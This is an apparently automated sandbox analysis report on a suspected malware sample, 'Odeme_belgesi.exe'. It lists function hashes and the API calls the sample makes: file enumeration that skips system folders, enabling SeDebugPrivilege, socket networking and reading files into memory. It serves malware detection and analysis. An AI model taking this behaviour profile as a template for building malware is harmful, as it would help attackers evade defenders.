Opcode Fuzzy Hash: 32e60c697c78be5c63a39b2b41467b916e08c7d8ec8174611a7f0e98c659d82f
Instruction Fuzzy Hash: 26813EB4E15219DFDB14CFA9C980A9EFBB2FF88304F248169D509A7365D730A942CF60

Function 028E5580 Relevance: .2, Instructions: 174COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1687887205.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28e0000_Odeme_belgesi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: efd064884e0e825c945c971350bc7cbbb39758ad8ce123057f4cdb32639dcb54
Instruction ID: 895e1f2961ae4a0e1a511d9e13bdbbc873073af7f8fbd4c1a04945cde0550022
Opcode Fuzzy Hash: efd064884e0e825c945c971350bc7cbbb39758ad8ce123057f4cdb32639dcb54
Instruction Fuzzy Hash: 3E71E278E11209DFCB04CFA9D48499EFBF2EF89314F64956AE419EB224D7349A41CF50

Function 028E5573 Relevance: .2, Instructions: 172COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1687887205.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28e0000_Odeme_belgesi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a75cecd5e981bd5dbdd6b527aedaf4289c58d38f857a9fada8c8b2aa5b39942f
Instruction ID: 59d8e90afc89d050122239548792ffd914d07a950e5c4b66b484d3644b04f99a
Opcode Fuzzy Hash: a75cecd5e981bd5dbdd6b527aedaf4289c58d38f857a9fada8c8b2aa5b39942f
Instruction Fuzzy Hash: CD71E178E11209DFCB04CFA9D48099EFBF2EF89314B248566E41AEB225D734AA41CF50

Function 04FF74C9 Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1690953633.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4ff0000_Odeme_belgesi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b2a80b1005f1c1aafffe743e5e2b36bde0597d33eac4badbeceefbb1d7c7b4d
Instruction ID: f715d1d2ebdab7b10672fc64c6938501d04b2bc337f9f0077dfd35ac365da682
Opcode Fuzzy Hash: 5b2a80b1005f1c1aafffe743e5e2b36bde0597d33eac4badbeceefbb1d7c7b4d
Instruction Fuzzy Hash: DD611875E0520A9FCB04DF99D9819AEFBF1FF89310F14942AD615AB220D374AA42CF90

Function 04FFABB8 Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1690953633.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4ff0000_Odeme_belgesi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba5ae1a1579f4b686702f36c927236d946fa850c87435f66088ce30045ab9798
Instruction ID: 6377b2770e122602e2a218e4b789bf2727f0088b120556a9ba4ea490402bf41b
Opcode Fuzzy Hash: ba5ae1a1579f4b686702f36c927236d946fa850c87435f66088ce30045ab9798
Instruction Fuzzy Hash: E371D575E05609CFDB04CFA9D9805DEFBF2FF88310F14942AD519B7224E334AA429B64

Function 028E6118 Relevance: .2, Instructions: 166COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1687887205.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28e0000_Odeme_belgesi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cfc31d4de2474c88b47c86cadd7de7cb03b74dbcc5c8f34c0153c082cc1532d
Instruction ID: f1b22a3d6dcc44be7c118cc83d5a1d87d7bf6dbe976c34ba4167b9c02a32ab2c
Opcode Fuzzy Hash: 8cfc31d4de2474c88b47c86cadd7de7cb03b74dbcc5c8f34c0153c082cc1532d
Instruction Fuzzy Hash: 4971F2B8D0021ADFCB05CF99C5819AEFBB6FF5A314F14951AD426A7311E334A942CF94

Function 04FFABA8 Relevance: .2, Instructions: 165COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1690953633.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4ff0000_Odeme_belgesi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 909213086c66b35ad7b609285011e3896a2623e455d0d601309024d628675ac1
Instruction ID: 9fb172491c30843cbcdc3d5c0215df7566287d83bd2fecb09cb7343f057f771e
Opcode Fuzzy Hash: 909213086c66b35ad7b609285011e3896a2623e455d0d601309024d628675ac1
Instruction Fuzzy Hash: D561E675E15609CFCB04CFA9C9809DEFBF2FF89310F14946AD519B7224E334AA429B64

Function 028E6109 Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1687887205.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28e0000_Odeme_belgesi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 265e34ef3aae539b6831784dd6fae48dbaca09423d89d711ea74ac0376ec58a9
Instruction ID: a8e0b397350a38eb2ab35eb0bd79ba3de6e973f9bf0ee185c7ab11dc0e21e332
Opcode Fuzzy Hash: 265e34ef3aae539b6831784dd6fae48dbaca09423d89d711ea74ac0376ec58a9
Instruction Fuzzy Hash: 7661F378D0421ACFCB05CFA9C5819AEFBB5FF9A314F148566D426E7211E334A942CF94

Function 028E6950 Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1687887205.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28e0000_Odeme_belgesi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a2d53797c5037dde6e006dfb5662a2c2cf3ecd7f32c570cc5f3e8552a114c08
Instruction ID: e8e6e541d7d07c8a534068c3374d84db10177785d97eef65a89ceb56b3f64909
Opcode Fuzzy Hash: 2a2d53797c5037dde6e006dfb5662a2c2cf3ecd7f32c570cc5f3e8552a114c08
Instruction Fuzzy Hash: 1161D278E05219CFCF08CFA9D5805EEFBF6AF99214F24942AD406B7314E3349941CB65

Function 028E6943 Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1687887205.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28e0000_Odeme_belgesi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2078c24d02ef98e40a426a03bde7dd9104e6d0e1c8e940a23290f747ab27763c
Instruction ID: 14290a9d87291739c47de21f10c8c6fe921dacdb080bc53682b612f823a8e1d0
Opcode Fuzzy Hash: 2078c24d02ef98e40a426a03bde7dd9104e6d0e1c8e940a23290f747ab27763c
Instruction Fuzzy Hash: 6D61D278E152198FCF08CFA9D5805EEFBF2AF99214F28942AD416F7314E3349A41CB64

Function 04FF1A18 Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1690953633.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4ff0000_Odeme_belgesi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba2b7077cd12e335cd9de4498ee9a7af88f8738617cf16bfb17c6285ece5a02a
Instruction ID: f58aaa469e4199501f41c78459cc295c3769db7358ab90a290f888888ec912fc
Opcode Fuzzy Hash: ba2b7077cd12e335cd9de4498ee9a7af88f8738617cf16bfb17c6285ece5a02a
Instruction Fuzzy Hash: DD611771E15209CFCB04CFAAD9805DEFBF2FF89310F14952AD505B7224E734AA428B65

Function 04FFBF48 Relevance: .1, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1690953633.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4ff0000_Odeme_belgesi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99ee8642bc1542e3033c5d7e7d65d2995152792e94ec3664ffacceb0c8224276
Instruction ID: 092dd4ca18fba40a83f63d7f9f4f4bbff267a91e5e290909e1f8d8922f82e97f
Opcode Fuzzy Hash: 99ee8642bc1542e3033c5d7e7d65d2995152792e94ec3664ffacceb0c8224276
Instruction Fuzzy Hash: D451CCB1D056548FEB29CF6A8C44699BBB3BFC9310F14C1FA950CAB215DB311A96CF41

Function 04FF1800 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1690953633.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4ff0000_Odeme_belgesi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae10d66a09bd540a60b20e5293f33254b5b93fc11be335d99890ffa0c994306e
Instruction ID: e8478225fac9b3d5d24708ef4c27b26af0691eb18334727c1a30ecc8777dd239
Opcode Fuzzy Hash: ae10d66a09bd540a60b20e5293f33254b5b93fc11be335d99890ffa0c994306e
Instruction Fuzzy Hash: 5C511A71E0460ADFCB04CFAACA405AEBBF2EF89310F54C56AC519A7214E7346A42CF50

Function 04FFA95A Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1690953633.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4ff0000_Odeme_belgesi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e7825c8f4ea4d03d868c232fe169750ae5c0341508b77c47c2d72f405e58b9b
Instruction ID: 86eef0bf206221e5d87c1993f480b2136bb9b975cc90f7637596710185144eb0
Opcode Fuzzy Hash: 8e7825c8f4ea4d03d868c232fe169750ae5c0341508b77c47c2d72f405e58b9b
Instruction Fuzzy Hash: E5510871E0460ADFCB14CFEAC9815AEFBB2AF98300F14D52AC519A7224E6349642DF94

Function 04FFF198 Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1690953633.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4ff0000_Odeme_belgesi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4e349e98843d2163fdb71b8535ee56b3ef61b2e1c1934c4a3b60f65b724aef8
Instruction ID: 558bb94ab2f6b110fef5490f8fbd0a51691722d96561ccacdfbb00c44f11c005
Opcode Fuzzy Hash: d4e349e98843d2163fdb71b8535ee56b3ef61b2e1c1934c4a3b60f65b724aef8
Instruction Fuzzy Hash: 7151F975E152198FDB58CFA9D980A9EF7B2FF88310F14C0AAD508A7324DB306A45CF61

Function 04FFA968 Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1690953633.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4ff0000_Odeme_belgesi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c80392e8d82c3a010370d15c197e910ef7936689da227262db9442a9e23e176b
Instruction ID: 745124b9c9ddabcae64e13576414091f64fad0c3fe89c9840cd27319ad95a75f
Opcode Fuzzy Hash: c80392e8d82c3a010370d15c197e910ef7936689da227262db9442a9e23e176b
Instruction Fuzzy Hash: 4A510B71E0560ADBCB14CFEAC9805AEFBF2EF98300F14D529C519A7364E734A6428F94

Function 04FF1C58 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1690953633.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4ff0000_Odeme_belgesi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fb194ea75a51a27acc8370c141620e198e3406b69ebbc7ab2ed50efbc8153e6
Instruction ID: bd094835bd1382e40bb9814b5f0892e94dd7be8b8a446f69148142fd43af15e4
Opcode Fuzzy Hash: 2fb194ea75a51a27acc8370c141620e198e3406b69ebbc7ab2ed50efbc8153e6
Instruction Fuzzy Hash: 6C41EB75E0520ADFDB44CFA9CA415EEFBF2AF88300F24D569C615B7224E7349A42CB94

Function 028E6B89 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1687887205.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28e0000_Odeme_belgesi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a249525ce290aea7ec9415ea0526c2b09d35cdc3df31e358e2fe7a0b54829558
Instruction ID: fe3907f24d671d9c70101ad80ab7beb4c3baa84a52f1ede32b36ba3e1983f349
Opcode Fuzzy Hash: a249525ce290aea7ec9415ea0526c2b09d35cdc3df31e358e2fe7a0b54829558
Instruction Fuzzy Hash: 2541D6B8E052199BDB44CFA9C5805AEFBF2FF89304F24846AC415E7215E7349A41CB95

Function 028E6B98 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1687887205.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28e0000_Odeme_belgesi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52cdeba3221ca41e07b8e3b65ccf8d35e757dabbeccdf80df329fd061848df9b
Instruction ID: 5116c416ba6b33bec7f10d9dc938c76ee3592e2168697fde7c0faec166af5f4b
Opcode Fuzzy Hash: 52cdeba3221ca41e07b8e3b65ccf8d35e757dabbeccdf80df329fd061848df9b
Instruction Fuzzy Hash: 4541E6B8E0521ADBDB44CFA9C5405AEFBF6FB99304F24846AC416F7214E7349A41CB94

Function 04FF1810 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1690953633.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4ff0000_Odeme_belgesi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bf86b0c9519b52eb3cf15e81e589ba82c68a0e9781dc81dbb87f5e64652a531
Instruction ID: c7c60b67990411c4100e29cf60a44491f3c8114a951dc15356cb698073d7b306
Opcode Fuzzy Hash: 8bf86b0c9519b52eb3cf15e81e589ba82c68a0e9781dc81dbb87f5e64652a531
Instruction Fuzzy Hash: 8341D971E0460ADFDB44CFAACA405AEBBF2BF88300F54C469C515B7254D7346A42DF94

Function 028E6758 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1687887205.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28e0000_Odeme_belgesi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1de603c352b8692d63940f8445ef3ef3998dc8043b3892a3fe79b4c9162a27a3
Instruction ID: 83a823faf870102495fc9fefc8860d7d09cf55905f33387e0771201dcc9e295a
Opcode Fuzzy Hash: 1de603c352b8692d63940f8445ef3ef3998dc8043b3892a3fe79b4c9162a27a3
Instruction Fuzzy Hash: 0F41E378E042199FCF44CFAAC4815AEBBF2BF99300F24C56AC815E7251E7349A45CF90

Function 028E6768 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1687887205.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28e0000_Odeme_belgesi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29e673fa9dd09bb611d6403e295518c5f89d91a4622257ab6c1adfca599964e4
Instruction ID: 0234d12a27e6df17dacc0d50a0da5c9b51fe137a7bf40b62051a9b2b557b76c5
Opcode Fuzzy Hash: 29e673fa9dd09bb611d6403e295518c5f89d91a4622257ab6c1adfca599964e4
Instruction Fuzzy Hash: 3541C2B8E0561ADBCF44CFAAC4815AEFBF6BB99300F24C52AC415E7250E7349A41CF94

Function 04FFF8E8 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1690953633.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4ff0000_Odeme_belgesi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68fa6dc971995b00158720b4a283438f5cbaaab4e546c9f8210239b61d804ec0
Instruction ID: e89adc35acc42d1cc84a2e11aba457d75b28c55d412e31710bd11d5dec610ed0
Opcode Fuzzy Hash: 68fa6dc971995b00158720b4a283438f5cbaaab4e546c9f8210239b61d804ec0
Instruction Fuzzy Hash: 1B315C71E11219DBDB28CF6AD8406AEFBB6FFC8200F10C17AD508A7214EB305A028F61

Function 028EA3F8 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1687887205.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28e0000_Odeme_belgesi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4e6a9ef70e98c0f47cd25d89a7bb80882dc293768b45051dfda9b61ab696cfa
Instruction ID: 8e1b4b981e274db246fa81170a099b382b4aef280e3ba44f895574acb332d940
Opcode Fuzzy Hash: d4e6a9ef70e98c0f47cd25d89a7bb80882dc293768b45051dfda9b61ab696cfa
Instruction Fuzzy Hash: F7213375E116198BDB18CFABD9406DEFBF7AFC8210F14C12AD508A7224EB304A128B90

Function 028EB198 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1687887205.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28e0000_Odeme_belgesi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e73ef53bb056dd96c8e1b4046014ea1d4eb61d20bee4f16b1c069bdb1437eb1
Instruction ID: ed3cedfa9af714d66b439d918c3a8e97fda0ee228170650f9d91418c1ef48bb8
Opcode Fuzzy Hash: 9e73ef53bb056dd96c8e1b4046014ea1d4eb61d20bee4f16b1c069bdb1437eb1
Instruction Fuzzy Hash: FB1144B1E116198BDB08CFAAD9416AEFBF7BFC8300F14C02AD908B7214DB305A118F90

Function 04FF0AC7 Relevance: 5.1, Strings: 4, Instructions: 78COMMON

Download Yara Rule

Strings

N$?', xrefs: 04FF0B87
N$?', xrefs: 04FF0B80
N$?', xrefs: 04FF0B1C
N$?', xrefs: 04FF0B9E

Memory Dump Source

Source File: 00000000.00000002.1690953633.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4ff0000_Odeme_belgesi.jbxd

Similarity

API ID:
String ID: N$?'$N$?'$N$?'$N$?'
API String ID: 0-2518781044
Opcode ID: 16f8c50024efc57e6c265156b9630ddaa3dda1855226660261b89fd60014c77f
Instruction ID: ee4c8caa36bdd359b02216444c94ac5fc38eb48816989b972335e72b6fc60bea
Opcode Fuzzy Hash: 16f8c50024efc57e6c265156b9630ddaa3dda1855226660261b89fd60014c77f
Instruction Fuzzy Hash: F63158B0E10119DFCB04CFA9C9905EEFBB2BF89304F1484AAC654B7211DB34AA46CF91

Analysis Process: Odeme_belgesi.exePID: 7124, Parent PID: 6912COMMON

Execution Graph

Execution Coverage:	31%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.4%
Total number of Nodes:	1846
Total number of Limit Nodes:	92

Executed Functions

Function 00403D74 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 200
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58

Strings

%s\%s, xrefs: 00403E3A, 00403EAF, 00403F1C
Program Files, xrefs: 00403E01
%s\*, xrefs: 00403D99
Windows, xrefs: 00403DEA

Memory Dump Source

Source File: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Odeme_belgesi.jbxd

Yara matches

Similarity

API ID: FileFind$FirstNext
String ID: %s\%s$%s\*$Program Files$Windows
API String ID: 1690352074-2009209621
Opcode ID: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
Opcode Fuzzy Hash: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C

Function 0040650A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589

Strings

SeDebugPrivilege, xrefs: 00406548

Memory Dump Source

Source File: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Odeme_belgesi.jbxd

Yara matches

Similarity

API ID: AdjustLookupPrivilegePrivilegesTokenValue
String ID: SeDebugPrivilege
API String ID: 3615134276-2896544425
Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674

Function 00402B7C Relevance: 3.0, APIs: 2, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

Memory Dump Source

Source File: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Odeme_belgesi.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9

Function 00404ED4 Relevance: 1.5, APIs: 1, Instructions: 9networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2

Memory Dump Source

Source File: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Odeme_belgesi.jbxd

Yara matches

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88

Function 004061C3 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 151
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
_wmemset.LIBCMT ref: 00406244
_wmemset.LIBCMT ref: 00406261
GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C

Strings

IDA, xrefs: 00406304
IDA, xrefs: 004061E5, 00406276, 004062AC, 0040621D, 004061E8, 00406220, 0040628B

Memory Dump Source

Source File: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Odeme_belgesi.jbxd

Yara matches

Similarity

API ID: _wmemset$ErrorInformationLastToken
String ID: IDA$IDA
API String ID: 487585393-2020647798
Opcode ID: d0395f9089772e9078c0cbeb7e7a69d574c5e4bdcef80e12950fd19a5f1576fd
Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
Opcode Fuzzy Hash: d0395f9089772e9078c0cbeb7e7a69d574c5e4bdcef80e12950fd19a5f1576fd
Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668

Function 00404E17 Relevance: 7.6, APIs: 5, Instructions: 72
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
socket.WS2_32(?,?,?), ref: 00404E7A
freeaddrinfo.WS2_32(00000000), ref: 00404E90

Memory Dump Source

Source File: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Odeme_belgesi.jbxd

Yara matches

Similarity

API ID: freeaddrinfogetaddrinfosocket
String ID:
API String ID: 2479546573-0
Opcode ID: d0cbd2bfe5b0935c94ba089aae0b4a72727b205c69b8882af43eb62a71f59e55
Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
Opcode Fuzzy Hash: d0cbd2bfe5b0935c94ba089aae0b4a72727b205c69b8882af43eb62a71f59e55
Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98

Function 004040BB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A

Strings

.tmp, xrefs: 00404196

Memory Dump Source

Source File: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Odeme_belgesi.jbxd

Yara matches

Similarity

API ID: File$AllocCreateReadVirtual
String ID: .tmp
API String ID: 3585551309-2986845003
Opcode ID: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
Opcode Fuzzy Hash: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
